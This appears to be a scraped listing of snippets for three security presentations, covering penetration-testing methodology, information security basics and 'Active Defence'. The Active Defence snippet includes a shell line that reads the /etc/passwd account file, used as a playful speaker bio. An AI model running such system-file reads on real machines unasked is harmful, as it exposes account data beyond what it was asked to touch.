Evaluating Website Security with Penetration Testing Methodology D. Menoski, P. Mitrevski and T. Dimovski St. Clement of Ohrid University in Bitola/Faculty of Technical Sciences, Bitola, Republic of Macedonia
More informationDefine information security Define security as process, not point product.
CSA 223 Network and Web Security Chapter One What is information security. Look at: Define information security Define security as process, not point product. Define information security Information is
More informationActive Defence A chance to fight back. Dott. Agostino PANICO Rome, 09/06/2016
Active Defence A chance to fight back Dott. Agostino PANICO Rome, 09/06/2016 $ cut -f5 -d: /etc/passwd grep -i panico PhD Student @ La Sapienza University of Rome Master Governance e Audit dei Sistemi
More information